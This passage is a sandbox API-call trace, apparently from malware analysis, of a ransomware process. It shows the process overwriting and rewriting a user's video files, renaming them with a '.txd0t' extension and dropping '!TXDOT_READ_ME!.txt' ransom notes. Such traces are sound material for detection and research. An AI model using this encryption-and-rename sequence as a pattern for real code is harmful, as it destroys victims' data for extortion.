lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xf620, lpOverlapped=0x0) returned 1 [0077.059] FlushFileBuffers (hFile=0x474) returned 1 [0077.062] GetProcessHeap () returned 0xe30000 [0077.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed2e18 [0077.062] StrCpyW (in: psz1=0xed2e18, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv" [0077.062] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv") returned="t8NhEX.mkv" [0077.062] StrCpyW (in: psz1=0xed2e66, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.062] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned 1 [0077.062] GetProcessHeap () returned 0xe30000 [0077.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2e18 | out: hHeap=0xe30000) returned 1 [0077.062] CloseHandle (hObject=0x474) returned 1 [0077.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\t8nhex.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\t8nhex.mkv.txd0t")) returned 1 [0077.066] SetEvent (hEvent=0x3f8) returned 1 [0077.066] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.067] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi" [0077.067] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t" [0077.067] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t") returned 0 [0077.067] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi", dwFileAttributes=0x80) returned 1 [0077.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\vzubwea5p.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.068] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=28056) returned 1 [0077.068] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.068] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.069] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff9068, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.069] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x6d90, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x6d90, lpOverlapped=0x0) returned 1 [0077.070] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff9270, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.070] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x6d90, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x6d90, lpOverlapped=0x0) returned 1 [0077.070] FlushFileBuffers (hFile=0x474) returned 1 [0077.072] GetProcessHeap () returned 0xe30000 [0077.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2d00 [0077.072] StrCpyW (in: psz1=0xed2d00, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi" [0077.072] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi") returned="VzUBwEA5P.avi" [0077.072] StrCpyW (in: psz1=0xed2d4e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.072] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned 1 [0077.072] GetProcessHeap () returned 0xe30000 [0077.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2d00 | out: hHeap=0xe30000) returned 1 [0077.073] CloseHandle (hObject=0x474) returned 1 [0077.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\vzubwea5p.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\vzubwea5p.avi.txd0t")) returned 1 [0077.075] SetEvent (hEvent=0x3f8) returned 1 [0077.075] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.076] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi" [0077.076] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t" [0077.076] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t") returned 0 [0077.076] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi", dwFileAttributes=0x80) returned 1 [0077.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\wxv-tmm4v.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.077] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=70716) returned 1 [0077.077] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.077] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.078] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffee9c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.078] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11430, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x11430, lpOverlapped=0x0) returned 1 [0077.080] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeebd0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.080] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11430, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x11430, lpOverlapped=0x0) returned 1 [0077.081] FlushFileBuffers (hFile=0x474) returned 1 [0077.083] GetProcessHeap () returned 0xe30000 [0077.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2558 [0077.083] StrCpyW (in: psz1=0xed2558, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi" [0077.083] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi") returned="WxV-TMM4v.avi" [0077.083] StrCpyW (in: psz1=0xed25a6, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.083] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned 1 [0077.084] GetProcessHeap () returned 0xe30000 [0077.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2558 | out: hHeap=0xe30000) returned 1 [0077.084] CloseHandle (hObject=0x474) returned 1 [0077.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\wxv-tmm4v.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\wxv-tmm4v.avi.txd0t")) returned 1 [0077.087] SetEvent (hEvent=0x3f8) returned 1 [0077.087] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.090] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf" [0077.090] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t" [0077.090] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t") returned 0 [0077.090] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf", dwFileAttributes=0x80) returned 1 [0077.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\2on gpnuw1jxd5i9rz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.095] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=17436) returned 1 [0077.095] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.095] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.097] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffb9e4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.097] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x4410, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x4410, lpOverlapped=0x0) returned 1 [0077.097] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffbbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.097] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x4410, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x4410, lpOverlapped=0x0) returned 1 [0077.098] FlushFileBuffers (hFile=0x474) returned 1 [0077.102] GetProcessHeap () returned 0xe30000 [0077.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed18f8 [0077.102] StrCpyW (in: psz1=0xed18f8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf" [0077.102] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf") returned="2oN gpnuW1JXd5I9rz.swf" [0077.102] StrCpyW (in: psz1=0xed1938, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.102] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt") returned 0 [0077.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0077.102] WriteFile (in: hFile=0x468, lpBuffer=0x37ff464*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x37ff464*, lpNumberOfBytesWritten=0x37ff460*=0x2, lpOverlapped=0x0) returned 1 [0077.103] FlushFileBuffers (hFile=0x468) returned 1 [0077.106] WriteFile (in: hFile=0x468, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff460*=0x7f0, lpOverlapped=0x0) returned 1 [0077.107] FlushFileBuffers (hFile=0x468) returned 1 [0077.108] CloseHandle (hObject=0x468) returned 1 [0077.108] GetProcessHeap () returned 0xe30000 [0077.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed18f8 | out: hHeap=0xe30000) returned 1 [0077.108] CloseHandle (hObject=0x474) returned 1 [0077.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\2on gpnuw1jxd5i9rz.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\2on gpnuw1jxd5i9rz.swf.txd0t")) returned 1 [0077.110] SetEvent (hEvent=0x3f8) returned 1 [0077.110] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.111] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf" [0077.111] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t" [0077.111] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t") returned 0 [0077.111] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf", dwFileAttributes=0x80) returned 1 [0077.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\2q3ks4tns0iqq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.111] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=97663) returned 1 [0077.111] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.111] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.112] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe8081, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.112] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x17d70, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x17d70, lpOverlapped=0x0) returned 1 [0077.114] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe8290, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.114] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x17d70, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x17d70, lpOverlapped=0x0) returned 1 [0077.114] FlushFileBuffers (hFile=0x474) returned 1 [0077.116] GetProcessHeap () returned 0xe30000 [0077.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed2788 [0077.117] StrCpyW (in: psz1=0xed2788, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf" [0077.117] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf") returned="2q3Ks4TNs0IQQ.swf" [0077.117] StrCpyW (in: psz1=0xed27c8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.117] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt") returned 1 [0077.117] GetProcessHeap () returned 0xe30000 [0077.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2788 | out: hHeap=0xe30000) returned 1 [0077.117] CloseHandle (hObject=0x474) returned 1 [0077.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\2q3ks4tns0iqq.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\2q3ks4tns0iqq.swf.txd0t")) returned 1 [0077.120] SetEvent (hEvent=0x3f8) returned 1 [0077.120] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.122] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv" [0077.122] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t" [0077.122] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t") returned 0 [0077.122] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv", dwFileAttributes=0x80) returned 1 [0077.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\d0y3irq9gxe8.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.122] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=67336) returned 1 [0077.122] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.122] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.123] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef6f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.123] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x10700, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x10700, lpOverlapped=0x0) returned 1 [0077.125] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef900, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.125] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x10700, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x10700, lpOverlapped=0x0) returned 1 [0077.125] FlushFileBuffers (hFile=0x474) returned 1 [0077.127] GetProcessHeap () returned 0xe30000 [0077.127] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0077.127] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv" [0077.127] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv") returned="d0y3irQ9gxE8.flv" [0077.127] StrCpyW (in: psz1=0xe9d790, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.127] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt") returned 1 [0077.127] GetProcessHeap () returned 0xe30000 [0077.127] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0077.127] CloseHandle (hObject=0x474) returned 1 [0077.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\d0y3irq9gxe8.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\d0y3irq9gxe8.flv.txd0t")) returned 1 [0077.130] SetEvent (hEvent=0x3f8) returned 1 [0077.130] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.131] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4" [0077.131] 